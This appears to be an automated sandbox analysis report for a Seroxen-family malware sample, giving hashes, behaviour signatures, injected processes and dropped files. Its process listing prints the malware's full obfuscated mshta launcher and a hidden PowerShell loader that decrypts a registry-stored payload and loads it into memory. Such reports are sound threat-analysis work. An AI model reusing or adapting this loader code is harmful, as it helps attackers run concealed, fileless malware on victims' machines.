Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 04-02-2025 21:09
Static task: static1

Behavioral task: behavioral1
  Sample: payload_1_sxr.exe
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: payload_1_sxr.exe
  Resource: win10v2004-20250129-en
General

Target: payload_1_sxr.exe
Size: 10.3MB
MD5: a0986241fcfed849a9d1dce2466840de
SHA1: 6e47f0378ab7c921b3c04d29aae5de1415d1aaf8
SHA256: ac562299cd216585d58cab4c435c1578f3e451820a4c0feb2d902d0662645446
SHA512: 8e192128a7be9b6b0857a3eca1a479ed28eaae2943ae1803fdd4b523c57e106f089c6b04cfe318a757171a3e52a603d91d395f94adbf9d5d5f300b3d91311ca4
SSDEEP: 49152:sKxzaVKJayp/GrDlGcfk/5ZRuUtNUDrTRaDqeF5gLRyoKq6XBkim7fEM27cIgpvW:sKxzcK
Malware Config
Signatures

- Seroxen family
- Suspicious use of NtCreateUserProcessOtherParentProcess (3 IoCs)
  description | pid | Process | procid_target
  PID 1100 created 432 | 1100 | payload_1_sxr.exe | 5
  PID 1100 created 432 | 1100 | payload_1_sxr.exe | 5
  PID 1100 created 432 | 1100 | payload_1_sxr.exe | 5
- Executes dropped EXE (3 IoCs)
  pid | Process
  2680 | $sxr-mshta.exe
  2796 | $sxr-cmd.exe
  2640 | $sxr-powershell.exe
- Hide Artifacts: Hidden Window (1 TTPs, 1 IoCs)
  Windows that would typically be displayed when an application carries out an operation can be hidden.
  pid | Process
  2640 | $sxr-powershell.exe
- Drops file in System32 directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | $sxr-powershell.exe
- Suspicious use of SetThreadContext (6 IoCs)
  description | pid | Process | procid_target
  PID 1100 set thread context of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 set thread context of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 set thread context of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 set thread context of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 set thread context of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 set thread context of 2744 | 1100 | payload_1_sxr.exe | 40
- Drops file in Windows directory (6 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\$sxr-cmd.exe | payload_1_sxr.exe
  File created | C:\Windows\$sxr-powershell.exe | payload_1_sxr.exe
  File opened for modification | C:\Windows\$sxr-powershell.exe | payload_1_sxr.exe
  File created | C:\Windows\$sxr-mshta.exe | payload_1_sxr.exe
  File opened for modification | C:\Windows\$sxr-mshta.exe | payload_1_sxr.exe
  File created | C:\Windows\$sxr-cmd.exe | payload_1_sxr.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (32 IoCs)
  pid | Process
  1100 | payload_1_sxr.exe
  1984 | dllhost.exe
  1984 | dllhost.exe
  1984 | dllhost.exe
  1984 | dllhost.exe
  2496 | dllhost.exe
  2496 | dllhost.exe
  2496 | dllhost.exe
  2496 | dllhost.exe
  1100 | payload_1_sxr.exe
  1100 | payload_1_sxr.exe
  2640 | $sxr-powershell.exe
  1100 | payload_1_sxr.exe
  2720 | dllhost.exe
  2720 | dllhost.exe
  2720 | dllhost.exe
  2720 | dllhost.exe
  2748 | dllhost.exe
  2748 | dllhost.exe
  2748 | dllhost.exe
  2748 | dllhost.exe
  1100 | payload_1_sxr.exe
  1100 | payload_1_sxr.exe
  1408 | dllhost.exe
  1408 | dllhost.exe
  1408 | dllhost.exe
  1408 | dllhost.exe
  1100 | payload_1_sxr.exe
  2744 | dllhost.exe
  2744 | dllhost.exe
  2744 | dllhost.exe
  2744 | dllhost.exe
- Suspicious use of AdjustPrivilegeToken (11 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1100 | payload_1_sxr.exe
  Token: SeDebugPrivilege | 1100 | payload_1_sxr.exe
  Token: SeDebugPrivilege | 1984 | dllhost.exe
  Token: SeDebugPrivilege | 2496 | dllhost.exe
  Token: SeDebugPrivilege | 2640 | $sxr-powershell.exe
  Token: SeDebugPrivilege | 1100 | payload_1_sxr.exe
  Token: SeDebugPrivilege | 2720 | dllhost.exe
  Token: SeDebugPrivilege | 2748 | dllhost.exe
  Token: SeDebugPrivilege | 1100 | payload_1_sxr.exe
  Token: SeDebugPrivilege | 1408 | dllhost.exe
  Token: SeDebugPrivilege | 2744 | dllhost.exe
- Suspicious use of WriteProcessMemory (63 IoCs)
  description | pid | Process | procid_target
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 1984 | 1100 | payload_1_sxr.exe | 28
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1100 wrote to memory of 2496 | 1100 | payload_1_sxr.exe | 29
  PID 1976 wrote to memory of 2680 | 1976 | taskeng.exe | 31
  PID 1976 wrote to memory of 2680 | 1976 | taskeng.exe | 31
  PID 1976 wrote to memory of 2680 | 1976 | taskeng.exe | 31
  PID 2680 wrote to memory of 2796 | 2680 | $sxr-mshta.exe | 32
  PID 2680 wrote to memory of 2796 | 2680 | $sxr-mshta.exe | 32
  PID 2680 wrote to memory of 2796 | 2680 | $sxr-mshta.exe | 32
  PID 2796 wrote to memory of 2640 | 2796 | $sxr-cmd.exe | 34
  PID 2796 wrote to memory of 2640 | 2796 | $sxr-cmd.exe | 34
  PID 2796 wrote to memory of 2640 | 2796 | $sxr-cmd.exe | 34
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2720 | 1100 | payload_1_sxr.exe | 37
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 2748 | 1100 | payload_1_sxr.exe | 38
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 1408 | 1100 | payload_1_sxr.exe | 39
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
  PID 1100 wrote to memory of 2744 | 1100 | payload_1_sxr.exe | 40
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\winlogon.exe (PID 432)
  Command line: winlogon.exe
  C:\Windows\System32\dllhost.exe (PID 1984)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{9d08454f-bcb6-449d-8940-551cbc079432}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe (PID 2720)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{e85a41a8-bc5e-479a-a18e-96dbbd842541}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe (PID 1408)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{d03f92de-e819-42e2-8bf3-169297fdf2ba}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe (PID 1100)
  Command line: "C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\dllhost.exe (PID 2496)
    Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{1475d315-b61f-41fa-9abc-b7526c246e42}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\dllhost.exe (PID 2748)
    Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{b396f7b4-a54c-46da-9737-6d52ddcbf93d}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\dllhost.exe (PID 2744)
    Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{84bc3a8f-e492-43ba-b7a1-f5c885afc4a0}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\taskeng.exe (PID 1976)
  Command line: taskeng.exe {D7329154-DA24-4876-9E55-C5ECD7F3F85D} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  C:\Windows\$sxr-mshta.exe (PID 2680)
    Command line: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    C:\Windows\$sxr-cmd.exe (PID 2796)
      Command line: "C:\Windows\$sxr-cmd.exe" /c %$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Windows\$sxr-powershell.exe (PID 2640)
        Command line:
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = 
[Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))
        - Executes dropped EXE
        - Hide Artifacts: Hidden Window
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 337KB
  MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

- Filesize: 13KB
  MD5: 95828d670cfd3b16ee188168e083c3c5
  SHA1: 83c70c66cd4e971be2e36efdc27fbcb7ff289032
  SHA256: 8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2
  SHA512: 22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

- Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d